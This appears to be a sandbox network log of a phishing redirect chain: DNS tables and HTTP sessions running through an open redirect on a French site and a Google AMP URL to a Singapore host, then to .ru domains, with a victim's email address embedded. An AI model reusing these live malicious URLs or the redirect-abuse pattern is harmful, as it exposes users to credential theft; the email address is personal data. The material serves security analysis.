                                                                      Jan 7, 2025 09:27:09.344094038 CET192.168.2.161.1.1.10x6f15Standard query (0)code.jquery.com65IN (0x0001)false
                                                                      Jan 7, 2025 09:27:09.973651886 CET192.168.2.161.1.1.10xdd1bStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                      Jan 7, 2025 09:27:09.975305080 CET192.168.2.161.1.1.10xe763Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                      Jan 7, 2025 09:27:10.003529072 CET192.168.2.161.1.1.10xa1f1Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                      Jan 7, 2025 09:27:10.003688097 CET192.168.2.161.1.1.10xc59cStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                      Jan 7, 2025 09:27:11.632453918 CET192.168.2.161.1.1.10xa5d5Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                      Jan 7, 2025 09:27:11.632453918 CET192.168.2.161.1.1.10xabfaStandard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                      Jan 7, 2025 09:27:18.330779076 CET192.168.2.161.1.1.10x4f17Standard query (0)urjjbcl7zjn3oxxccjwqz2q7zi04ojkjkrz1t4k1kfvv39eacai.ivertoneym.ruA (IP address)IN (0x0001)false
                                                                      Jan 7, 2025 09:27:18.330902100 CET192.168.2.161.1.1.10xb631Standard query (0)urjjbcl7zjn3oxxccjwqz2q7zi04ojkjkrz1t4k1kfvv39eacai.ivertoneym.ru65IN (0x0001)false
                                                                      Jan 7, 2025 09:27:19.964768887 CET192.168.2.161.1.1.10x2b85Standard query (0)login.microsoftonline.comA (IP address)IN (0x0001)false
                                                                      Jan 7, 2025 09:27:19.964951038 CET192.168.2.161.1.1.10x86e4Standard query (0)login.microsoftonline.com65IN (0x0001)false
                                                                      Jan 7, 2025 09:27:19.968722105 CET192.168.2.161.1.1.10x2ea3Standard query (0)urjjbcl7zjn3oxxccjwqz2q7zi04ojkjkrz1t4k1kfvv39eacai.ivertoneym.ruA (IP address)IN (0x0001)false
                                                                      Jan 7, 2025 09:27:19.968883038 CET192.168.2.161.1.1.10x2985Standard query (0)urjjbcl7zjn3oxxccjwqz2q7zi04ojkjkrz1t4k1kfvv39eacai.ivertoneym.ru65IN (0x0001)false
                                                                      Jan 7, 2025 09:27:21.006028891 CET192.168.2.161.1.1.10xc145Standard query (0)www.office.comA (IP address)IN (0x0001)false
                                                                      Jan 7, 2025 09:27:21.006197929 CET192.168.2.161.1.1.10xd582Standard query (0)www.office.com65IN (0x0001)false
                                                                      Jan 7, 2025 09:27:23.052606106 CET192.168.2.161.1.1.10xf11cStandard query (0)www.office.comA (IP address)IN (0x0001)false
                                                                      Jan 7, 2025 09:27:23.052766085 CET192.168.2.161.1.1.10xc5a8Standard query (0)www.office.com65IN (0x0001)false
                                                                      Jan 7, 2025 09:27:24.217621088 CET192.168.2.161.1.1.10x5aeStandard query (0)aadcdn.msftauth.netA (IP address)IN (0x0001)false
                                                                      Jan 7, 2025 09:27:24.218182087 CET192.168.2.161.1.1.10x85d6Standard query (0)aadcdn.msftauth.net65IN (0x0001)false
                                                                      Jan 7, 2025 09:28:06.031141043 CET192.168.2.161.1.1.10x910bStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                      Jan 7, 2025 09:28:06.031282902 CET192.168.2.161.1.1.10x5ee1Standard query (0)www.google.com65IN (0x0001)false
                                                                      Jan 7, 2025 09:28:11.643244028 CET192.168.2.161.1.1.10x8f01Standard query (0)identity.nel.measure.office.netA (IP address)IN (0x0001)false
                                                                      Jan 7, 2025 09:28:11.643418074 CET192.168.2.161.1.1.10x8f07Standard query (0)identity.nel.measure.office.net65IN (0x0001)false
                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                      Jan 7, 2025 09:27:02.107152939 CET1.1.1.1192.168.2.160x882fNo error (0)t1.a.editions-legislatives.frelsgestion-mkt-prod1-zy9e8-964990648.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                      Jan 7, 2025 09:27:02.107152939 CET1.1.1.1192.168.2.160x882fNo error (0)elsgestion-mkt-prod1-zy9e8-964990648.eu-west-1.elb.amazonaws.com52.48.213.169A (IP address)IN (0x0001)false
                                                                      Jan 7, 2025 09:27:02.107152939 CET1.1.1.1192.168.2.160x882fNo error (0)elsgestion-mkt-prod1-zy9e8-964990648.eu-west-1.elb.amazonaws.com52.16.219.193A (IP address)IN (0x0001)false
                                                                      Jan 7, 2025 09:27:02.126827955 CET1.1.1.1192.168.2.160x9e0fNo error (0)t1.a.editions-legislatives.frelsgestion-mkt-prod1-zy9e8-964990648.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                      Jan 7, 2025 09:27:03.315030098 CET1.1.1.1192.168.2.160x1155No error (0)www.google.co.nz142.250.185.67A (IP address)IN (0x0001)false
                                                                      Jan 7, 2025 09:27:03.316821098 CET1.1.1.1192.168.2.160xef0fNo error (0)www.google.co.nz65IN (0x0001)false
                                                                      Jan 7, 2025 09:27:05.502902985 CET1.1.1.1192.168.2.160x3eb9No error (0)yesmotoring.com.sg103.15.234.11A (IP address)IN (0x0001)false
                                                                      Jan 7, 2025 09:27:05.982353926 CET1.1.1.1192.168.2.160x8eeeNo error (0)www.google.com216.58.206.68A (IP address)IN (0x0001)false
                                                                      Jan 7, 2025 09:27:05.985755920 CET1.1.1.1192.168.2.160x34b9No error (0)www.google.com65IN (0x0001)false
                                                                      Jan 7, 2025 09:27:06.722975016 CET1.1.1.1192.168.2.160x804aNo error (0)y7.novenef.ru65IN (0x0001)false
                                                                      Jan 7, 2025 09:27:06.824775934 CET1.1.1.1192.168.2.160xfcaeNo error (0)y7.novenef.ru104.21.64.1A (IP address)IN (0x0001)false
                                                                      Jan 7, 2025 09:27:06.824775934 CET1.1.1.1192.168.2.160xfcaeNo error (0)y7.novenef.ru104.21.80.1A (IP address)IN (0x0001)false
                                                                      Jan 7, 2025 09:27:06.824775934 CET1.1.1.1192.168.2.160xfcaeNo error (0)y7.novenef.ru104.21.96.1A (IP address)IN (0x0001)false
                                                                      Jan 7, 2025 09:27:06.824775934 CET1.1.1.1192.168.2.160xfcaeNo error (0)y7.novenef.ru104.21.16.1A (IP address)IN (0x0001)false
                                                                      Jan 7, 2025 09:27:06.824775934 CET1.1.1.1192.168.2.160xfcaeNo error (0)y7.novenef.ru104.21.48.1A (IP address)IN (0x0001)false
                                                                      Jan 7, 2025 09:27:06.824775934 CET1.1.1.1192.168.2.160xfcaeNo error (0)y7.novenef.ru104.21.112.1A (IP address)IN (0x0001)false
                                                                      Jan 7, 2025 09:27:06.824775934 CET1.1.1.1192.168.2.160xfcaeNo error (0)y7.novenef.ru104.21.32.1A (IP address)IN (0x0001)false
                                                                      Jan 7, 2025 09:27:08.598058939 CET1.1.1.1192.168.2.160xc915No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                      Jan 7, 2025 09:27:08.598058939 CET1.1.1.1192.168.2.160xc915No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                      Jan 7, 2025 09:27:08.598105907 CET1.1.1.1192.168.2.160x608bNo error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                      Jan 7, 2025 09:27:08.598105907 CET1.1.1.1192.168.2.160x608bNo error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                      Jan 7, 2025 09:27:08.598105907 CET1.1.1.1192.168.2.160x608bNo error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                      Jan 7, 2025 09:27:08.598105907 CET1.1.1.1192.168.2.160x608bNo error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                      Jan 7, 2025 09:27:08.598393917 CET1.1.1.1192.168.2.160xe421No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                      Jan 7, 2025 09:27:08.598591089 CET1.1.1.1192.168.2.160xe304No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                      Jan 7, 2025 09:27:08.598591089 CET1.1.1.1192.168.2.160xe304No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                      Jan 7, 2025 09:27:08.599093914 CET1.1.1.1192.168.2.160x8f0bNo error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                      Jan 7, 2025 09:27:09.329313040 CET1.1.1.1192.168.2.160xbca1No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                      Jan 7, 2025 09:27:09.329327106 CET1.1.1.1192.168.2.160xbfcNo error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                      Jan 7, 2025 09:27:09.329327106 CET1.1.1.1192.168.2.160xbfcNo error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                      Jan 7, 2025 09:27:09.350527048 CET1.1.1.1192.168.2.160xb035No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                      Jan 7, 2025 09:27:09.350527048 CET1.1.1.1192.168.2.160xb035No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                      Jan 7, 2025 09:27:09.350527048 CET1.1.1.1192.168.2.160xb035No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                      Jan 7, 2025 09:27:09.350527048 CET1.1.1.1192.168.2.160xb035No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                      Jan 7, 2025 09:27:09.980245113 CET1.1.1.1192.168.2.160xdd1bNo error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                      Jan 7, 2025 09:27:09.980245113 CET1.1.1.1192.168.2.160xdd1bNo error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                      Jan 7, 2025 09:27:09.982155085 CET1.1.1.1192.168.2.160xe763No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                      Jan 7, 2025 09:27:10.011806965 CET1.1.1.1192.168.2.160xc59cNo error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                      Jan 7, 2025 09:27:10.011873007 CET1.1.1.1192.168.2.160xa1f1No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                      Jan 7, 2025 09:27:10.011873007 CET1.1.1.1192.168.2.160xa1f1No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                      Jan 7, 2025 09:27:11.639372110 CET1.1.1.1192.168.2.160xa5d5No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                      Jan 7, 2025 09:27:18.481847048 CET1.1.1.1192.168.2.160x4f17No error (0)urjjbcl7zjn3oxxccjwqz2q7zi04ojkjkrz1t4k1kfvv39eacai.ivertoneym.ru104.21.42.208A (IP address)IN (0x0001)false
                                                                      Jan 7, 2025 09:27:18.481847048 CET1.1.1.1192.168.2.160x4f17No error (0)urjjbcl7zjn3oxxccjwqz2q7zi04ojkjkrz1t4k1kfvv39eacai.ivertoneym.ru172.67.166.74A (IP address)IN (0x0001)false
                                                                      Jan 7, 2025 09:27:18.489624977 CET1.1.1.1192.168.2.160xb631No error (0)urjjbcl7zjn3oxxccjwqz2q7zi04ojkjkrz1t4k1kfvv39eacai.ivertoneym.ru65IN (0x0001)false
                                                                      Jan 7, 2025 09:27:19.971788883 CET1.1.1.1192.168.2.160x2b85No error (0)login.microsoftonline.comlogin.mso.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                      Jan 7, 2025 09:27:19.971963882 CET1.1.1.1192.168.2.160x86e4No error (0)login.microsoftonline.comlogin.mso.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                      Jan 7, 2025 09:27:20.077368021 CET1.1.1.1192.168.2.160x2ea3No error (0)urjjbcl7zjn3oxxccjwqz2q7zi04ojkjkrz1t4k1kfvv39eacai.ivertoneym.ru104.21.42.208A (IP address)IN (0x0001)false
                                                                      Jan 7, 2025 09:27:20.077368021 CET1.1.1.1192.168.2.160x2ea3No error (0)urjjbcl7zjn3oxxccjwqz2q7zi04ojkjkrz1t4k1kfvv39eacai.ivertoneym.ru172.67.166.74A (IP address)IN (0x0001)false
                                                                      Jan 7, 2025 09:27:20.077543974 CET1.1.1.1192.168.2.160x2985No error (0)urjjbcl7zjn3oxxccjwqz2q7zi04ojkjkrz1t4k1kfvv39eacai.ivertoneym.ru65IN (0x0001)false
                                                                      Jan 7, 2025 09:27:21.012654066 CET1.1.1.1192.168.2.160xc145No error (0)www.office.comhome-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                                      Jan 7, 2025 09:27:21.012654066 CET1.1.1.1192.168.2.160xc145No error (0)home-portal.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                      Jan 7, 2025 09:27:21.013312101 CET1.1.1.1192.168.2.160xd582No error (0)www.office.comhome-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                                      Jan 7, 2025 09:27:21.013312101 CET1.1.1.1192.168.2.160xd582No error (0)home-portal.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                      Jan 7, 2025 09:27:22.192653894 CET1.1.1.1192.168.2.160xada7No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                      Jan 7, 2025 09:27:22.192653894 CET1.1.1.1192.168.2.160xada7No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                      Jan 7, 2025 09:27:23.032774925 CET1.1.1.1192.168.2.160x975eNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                      Jan 7, 2025 09:27:23.032774925 CET1.1.1.1192.168.2.160x975eNo error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                      Jan 7, 2025 09:27:23.060077906 CET1.1.1.1192.168.2.160xf11cNo error (0)www.office.comhome-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                                      Jan 7, 2025 09:27:23.060077906 CET1.1.1.1192.168.2.160xf11cNo error (0)home-portal.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                      Jan 7, 2025 09:27:23.060091019 CET1.1.1.1192.168.2.160xc5a8No error (0)www.office.comhome-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                                      Jan 7, 2025 09:27:23.060091019 CET1.1.1.1192.168.2.160xc5a8No error (0)home-portal.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                      Jan 7, 2025 09:27:24.224870920 CET1.1.1.1192.168.2.160x5aeNo error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                      Jan 7, 2025 09:27:24.224870920 CET1.1.1.1192.168.2.160x5aeNo error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                      Jan 7, 2025 09:27:24.224870920 CET1.1.1.1192.168.2.160x5aeNo error (0)sni1gl.wpc.omegacdn.net152.199.21.175A (IP address)IN (0x0001)false
                                                                      Jan 7, 2025 09:27:24.226521015 CET1.1.1.1192.168.2.160x85d6No error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                      Jan 7, 2025 09:27:24.226521015 CET1.1.1.1192.168.2.160x85d6No error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                      Jan 7, 2025 09:28:06.038521051 CET1.1.1.1192.168.2.160x910bNo error (0)www.google.com142.250.185.68A (IP address)IN (0x0001)false
                                                                      Jan 7, 2025 09:28:06.038773060 CET1.1.1.1192.168.2.160x5ee1No error (0)www.google.com65IN (0x0001)false
                                                                      Jan 7, 2025 09:28:11.650234938 CET1.1.1.1192.168.2.160x8f07No error (0)identity.nel.measure.office.netnel.measure.office.net.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                      Jan 7, 2025 09:28:11.650732994 CET1.1.1.1192.168.2.160x8f01No error (0)identity.nel.measure.office.netnel.measure.office.net.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                      • t1.a.editions-legislatives.fr
                                                                      • www.google.co.nz
                                                                      • yesmotoring.com.sg
                                                                        • y7.novenef.ru
                                                                      • https:
                                                                        • code.jquery.com
                                                                        • challenges.cloudflare.com
                                                                        • cdnjs.cloudflare.com
                                                                        • urjjbcl7zjn3oxxccjwqz2q7zi04ojkjkrz1t4k1kfvv39eacai.ivertoneym.ru
                                                                      • a.nel.cloudflare.com
                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      0192.168.2.1649711103.15.234.11806908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      Jan 7, 2025 09:27:05.511384010 CET506OUTGET /upthere/running/8mspbf71i0mf51h0zfhwhu2z/cGhpbC5sZXNzYXJkQG1vZHVsYS5jb20= HTTP/1.1
                                                                      Host: yesmotoring.com.sg
                                                                      Connection: keep-alive
                                                                      Upgrade-Insecure-Requests: 1
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Jan 7, 2025 09:27:06.460196972 CET265INHTTP/1.1 200 OK
                                                                      Date: Tue, 07 Jan 2025 08:27:06 GMT
                                                                      Server: Apache
                                                                      refresh: 0;url=https://Y7.novenef.ru/Lj9e/#Aphil.lessard@modula.com
                                                                      Keep-Alive: timeout=5, max=100
                                                                      Connection: Keep-Alive
                                                                      Transfer-Encoding: chunked
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Jan 7, 2025 09:27:06.595532894 CET5INData Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0
                                                                      Jan 7, 2025 09:27:06.628307104 CET453OUTGET /favicon.ico HTTP/1.1
                                                                      Host: yesmotoring.com.sg
                                                                      Connection: keep-alive
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                      Referer: http://yesmotoring.com.sg/upthere/running/8mspbf71i0mf51h0zfhwhu2z/cGhpbC5sZXNzYXJkQG1vZHVsYS5jb20=
                                                                      Accept-Encoding: gzip, deflate
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      Jan 7, 2025 09:27:06.951848030 CET515INHTTP/1.1 404 Not Found
                                                                      Date: Tue, 07 Jan 2025 08:27:06 GMT
                                                                      Server: Apache
                                                                      Content-Length: 315
                                                                      Keep-Alive: timeout=5, max=99
                                                                      Connection: Keep-Alive
                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      0192.168.2.164970852.48.213.1694436908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2025-01-07 08:27:03 UTC1221OUTGET /r/?id=hfe20c57a%2C3602a3f1%2C7f94ba88&p1=//www.google.co.nz/url?q=k8pQvvqad5fe5yj7Y00xDjnlx9kIHvsdvds44vs4d4aAkImPuQvsdv44WtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRvdsvsdvswqyicT&sa=t&url=amp/yesmotoring.com.sg/upthere/running/8mspbf71i0mf51h0zfhwhu2z/cGhpbC5sZXNzYXJkQG1vZHVsYS5jb20=&ago=212&ao=817&aca=-11&si=-11&ci=-11&pi=-11&ad=-11&sv1=-11&advt=-11&chnl=-11&vndr=1363&sz=539&u=eTLPPreWarranty%7CConsumer&red=http://www.lampsplus.com/?sourceid=eTLPPreWarranty&cm_mmc=TRA-EM-_-LP-_-eTLPPreWarranty-_-tlogo&counterid=tlogo HTTP/1.1
                                                                      Host: t1.a.editions-legislatives.fr
                                                                      Connection: keep-alive
                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                      sec-ch-ua-mobile: ?0
                                                                      sec-ch-ua-platform: "Windows"
                                                                      Upgrade-Insecure-Requests: 1
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Sec-Fetch-Site: none
                                                                      Sec-Fetch-Mode: navigate
                                                                      Sec-Fetch-User: ?1
                                                                      Sec-Fetch-Dest: document
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      2025-01-07 08:27:03 UTC1140INHTTP/1.1 302 Found
                                                                      Date: Tue, 07 Jan 2025 08:27:03 GMT
                                                                      Content-Type: text/plain; charset=utf-8
                                                                      Content-Length: 17
                                                                      Connection: close
                                                                      Server: Apache
                                                                      X-Robots-Tag: noindex
                                                                      P3P: CP="CAO DSP COR CURa DEVa TAIa OUR BUS IND UNI COM NAV"
                                                                      Location: https:////www.google.co.nz/url?q=k8pQvvqad5fe5yj7Y00xDjnlx9kIHvsdvds44vs4d4aAkImPuQvsdv44WtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRvdsvsdvswqyicT&sa=t&url=amp/yesmotoring.com.sg/upthere/running/8mspbf71i0mf51h0zfhwhu2z/cGhpbC5sZXNzYXJkQG1vZHVsYS5jb20=&ago=212&ao=817&aca=-11&si=-11&ci=-11&pi=-11&ad=-11&sv1=-11&advt=-11&chnl=-11&vndr=1363&sz=539&u=eTLPPreWarranty%7CConsumer&red=http://www.lampsplus.com/?sourceid=eTLPPreWarranty&cm_mmc=TRA-EM-_-LP-_-eTLPPreWarranty-_-tlogo&counterid=tlogo
                                                                      Set-Cookie: AMCV_EDB0539A5733225A7F000101%40AdobeOrg=MCMID%7C61127832386378117110836468571935604735; Domain=editions-legislatives.fr; Path=/; Expires=Sun, 01-Feb-2026 08:27:03 GMT
                                                                      Set-Cookie: nlid=fe20c57a|3602a3f1; Domain=editions-legislatives.fr; Path=/
                                                                      Set-Cookie: nllastdelid=3602a3f1; Domain=editions-legislatives.fr; Path=/; Expires=Sun, 01-Feb-2026 08:27:03 GMT
                                                                      2025-01-07 08:27:03 UTC17INData Raw: 54 65 6d 70 6f 72 61 72 69 6c 79 20 6d 6f 76 65 64
                                                                      Data Ascii: Temporarily moved


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      1192.168.2.1649709142.250.185.674436908C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2025-01-07 08:27:03 UTC1148OUTGET /url?q=k8pQvvqad5fe5yj7Y00xDjnlx9kIHvsdvds44vs4d4aAkImPuQvsdv44WtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRvdsvsdvswqyicT&sa=t&url=amp/yesmotoring.com.sg/upthere/running/8mspbf71i0mf51h0zfhwhu2z/cGhpbC5sZXNzYXJkQG1vZHVsYS5jb20=&ago=212&ao=817&aca=-11&si=-11&ci=-11&pi=-11&ad=-11&sv1=-11&advt=-11&chnl=-11&vndr=1363&sz=539&u=eTLPPreWarranty%7CConsumer&red=http://www.lampsplus.com/?sourceid=eTLPPreWarranty&cm_mmc=TRA-EM-_-LP-_-eTLPPreWarranty-_-tlogo&counterid=tlogo HTTP/1.1
                                                                      Host: www.google.co.nz
                                                                      Connection: keep-alive
                                                                      Upgrade-Insecure-Requests: 1
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Sec-Fetch-Site: none
                                                                      Sec-Fetch-Mode: navigate
                                                                      Sec-Fetch-User: ?1
                                                                      Sec-Fetch-Dest: document
                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                      sec-ch-ua-mobile: ?0
                                                                      sec-ch-ua-platform: "Windows"
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      2025-01-07 08:27:04 UTC1084INHTTP/1.1 302 Found
                                                                      Location: https://www.google.co.nz/amp/yesmotoring.com.sg/upthere/running/8mspbf71i0mf51h0zfhwhu2z/cGhpbC5sZXNzYXJkQG1vZHVsYS5jb20=
                                                                      Cache-Control: private
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Strict-Transport-Security: max-age=31536000
                                                                      Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-b_My3TIVtROrH6eHlv5Lgw' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other
                                                                      Permissions-Policy: unload=()
                                                                      P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                      Date: Tue, 07 Jan 2025 08:27:04 GMT
                                                                      Server: gws
                                                                      Content-Length: 318
                                                                      X-XSS-Protection: 0
                                                                      Set-Cookie: NID=520=LVcWUJwgx6KapFVhpgJ7Eo-DWc9UXuY6dAPr8IHEXhIcHEhyagOSMUoALBVVMlMEGD8TfxFva-K8usx04PDoWB4IY3gg91E2Nr0KCzmNCIf8y5FV5mgZM3b3ryzZ6PVk3H_vXtkaE2FkWUtmy8-S3bRWjxtsVbar735DbkGV30jR1T5wi64fvvFl5xTECBK4Rh3gaQ; expires=Wed, 09-Jul-2025 08:27:04 GMT; path=/; domain=.google.co.nz; Secure; HttpOnly; SameSite=none
                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                      Connection: close
